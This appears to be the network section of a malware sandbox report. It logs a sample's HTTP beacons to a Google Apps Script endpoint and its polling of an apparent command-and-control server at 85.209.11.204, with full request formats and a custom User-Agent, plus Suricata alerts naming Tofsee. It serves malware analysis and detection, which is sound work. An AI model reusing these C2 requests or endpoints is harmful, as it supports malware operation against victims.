Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
script.googleusercontent.com | 142.250.206.225 | |
script.google.com | 142.250.206.238 |
- TCP Requests
GET
302
https://script.google.com/macros/s/AKfycbzq1CWyl36rt9O8a0Zlm5Z6LRB2igbns3CkTay10UBerGZv4zl389I1MOMTE8g-CKY/exec?xfgnxfgn&stream=5&ip=175.208.134.152&slots=0000¶m=empty
REQUEST
RESPONSE
BODY
GET /macros/s/AKfycbzq1CWyl36rt9O8a0Zlm5Z6LRB2igbns3CkTay10UBerGZv4zl389I1MOMTE8g-CKY/exec?xfgnxfgn&stream=5&ip=175.208.134.152&slots=0000¶m=empty HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Host: script.google.com
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Access-Control-Allow-Origin: *
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 06 Nov 2023 00:36:00 GMT
Location: https://script.googleusercontent.com/macros/echo?user_content_key=rq3I6Pvq31ESr42SRVFCcH8cBMrOvGfc9LjrAFAjXKqooXQVZnHoVSKZ49ywNUr7mn_h-t_4xp16ZbQUh0u7vYizKKleUSwSOJmA1Yb3SEsKFZqtv3DaNYcMrmhZHmUMWojr9NvTBuBLhyHCd5hHa0CRDStSlAiWe9EsIf9E4ZPsnymwtpgwALY3ZEKNbUPKTwCm-q5YBdK9ax9ulRNROyEZlBVHKdgUzc9XRB8G-pFIaTITfR7fJ9yLw_QwlOLh3sVTfjuTogDzV_l7Cl_ErHbadLHwSTw0RLfCUlcjW3aqDyDBdoyuR54_mWWztr2JN0ZmedBznvo&lib=MGiFI8QOoThWusP0Kv6sJRfccXc-Ar0ZC
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
GET
200
https://script.googleusercontent.com/macros/echo?user_content_key=rq3I6Pvq31ESr42SRVFCcH8cBMrOvGfc9LjrAFAjXKqooXQVZnHoVSKZ49ywNUr7mn_h-t_4xp16ZbQUh0u7vYizKKleUSwSOJmA1Yb3SEsKFZqtv3DaNYcMrmhZHmUMWojr9NvTBuBLhyHCd5hHa0CRDStSlAiWe9EsIf9E4ZPsnymwtpgwALY3ZEKNbUPKTwCm-q5YBdK9ax9ulRNROyEZlBVHKdgUzc9XRB8G-pFIaTITfR7fJ9yLw_QwlOLh3sVTfjuTogDzV_l7Cl_ErHbadLHwSTw0RLfCUlcjW3aqDyDBdoyuR54_mWWztr2JN0ZmedBznvo&lib=MGiFI8QOoThWusP0Kv6sJRfccXc-Ar0ZC
REQUEST
RESPONSE
BODY
GET /macros/echo?user_content_key=rq3I6Pvq31ESr42SRVFCcH8cBMrOvGfc9LjrAFAjXKqooXQVZnHoVSKZ49ywNUr7mn_h-t_4xp16ZbQUh0u7vYizKKleUSwSOJmA1Yb3SEsKFZqtv3DaNYcMrmhZHmUMWojr9NvTBuBLhyHCd5hHa0CRDStSlAiWe9EsIf9E4ZPsnymwtpgwALY3ZEKNbUPKTwCm-q5YBdK9ax9ulRNROyEZlBVHKdgUzc9XRB8G-pFIaTITfR7fJ9yLw_QwlOLh3sVTfjuTogDzV_l7Cl_ErHbadLHwSTw0RLfCUlcjW3aqDyDBdoyuR54_mWWztr2JN0ZmedBznvo&lib=MGiFI8QOoThWusP0Kv6sJRfccXc-Ar0ZC HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Host: script.googleusercontent.com
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Access-Control-Allow-Origin: *
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 06 Nov 2023 00:36:01 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
Transfer-Encoding: chunked
GET
200
http://85.209.11.204/ip.php
REQUEST
RESPONSE
BODY
GET /ip.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: U1#|ZG8aGX9|L0|0up0
Host: 85.209.11.204
HTTP/1.1 200 OK
Date: Mon, 06 Nov 2023 00:35:37 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 15
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET
200
http://85.209.11.204/api/files/client/s51
REQUEST
RESPONSE
BODY
GET /api/files/client/s51 HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: U1#|ZG8aGX9|L0|0up0
Host: 85.209.11.204
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 06 Nov 2023 00:35:37 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET
200
http://85.209.11.204/api/files/client/s52
REQUEST
RESPONSE
BODY
GET /api/files/client/s52 HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: U1#|ZG8aGX9|L0|0up0
Host: 85.209.11.204
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 06 Nov 2023 00:35:42 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET
200
http://85.209.11.204/api/files/client/s53
REQUEST
RESPONSE
BODY
GET /api/files/client/s53 HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: U1#|ZG8aGX9|L0|0up0
Host: 85.209.11.204
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 06 Nov 2023 00:35:48 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET
200
http://85.209.11.204/api/files/client/s54
REQUEST
RESPONSE
BODY
GET /api/files/client/s54 HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: U1#|ZG8aGX9|L0|0up0
Host: 85.209.11.204
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 06 Nov 2023 00:35:53 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET
301
http://script.google.com/macros/s/AKfycbzq1CWyl36rt9O8a0Zlm5Z6LRB2igbns3CkTay10UBerGZv4zl389I1MOMTE8g-CKY/exec?xfgnxfgn&stream=5&ip=175.208.134.152&slots=0000¶m=empty
REQUEST
RESPONSE
BODY
GET /macros/s/AKfycbzq1CWyl36rt9O8a0Zlm5Z6LRB2igbns3CkTay10UBerGZv4zl389I1MOMTE8g-CKY/exec?xfgnxfgn&stream=5&ip=175.208.134.152&slots=0000¶m=empty HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Host: script.google.com
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 06 Nov 2023 00:35:58 GMT
Location: https://script.google.com/macros/s/AKfycbzq1CWyl36rt9O8a0Zlm5Z6LRB2igbns3CkTay10UBerGZv4zl389I1MOMTE8g-CKY/exec?xfgnxfgn&stream=5&ip=175.208.134.152&slots=0000¶m=empty
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-XSS-Protection: 1; mode=block
Server: GSE
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49170 -> 172.217.24.78:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.103:49171 -> 142.251.220.33:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49170 172.217.24.78:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.google.com | fd:ee:45:21:a2:3c:95:82:9b:ba:3f:7a:59:3c:f6:c2:7b:c7:84:8f |
TLSv1 192.168.56.103:49171 142.251.220.33:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.googleusercontent.com | cb:bb:d8:fc:60:aa:94:8f:47:5c:88:bb:c3:30:22:92:26:d3:85:2f |
Snort Alerts
No Snort Alerts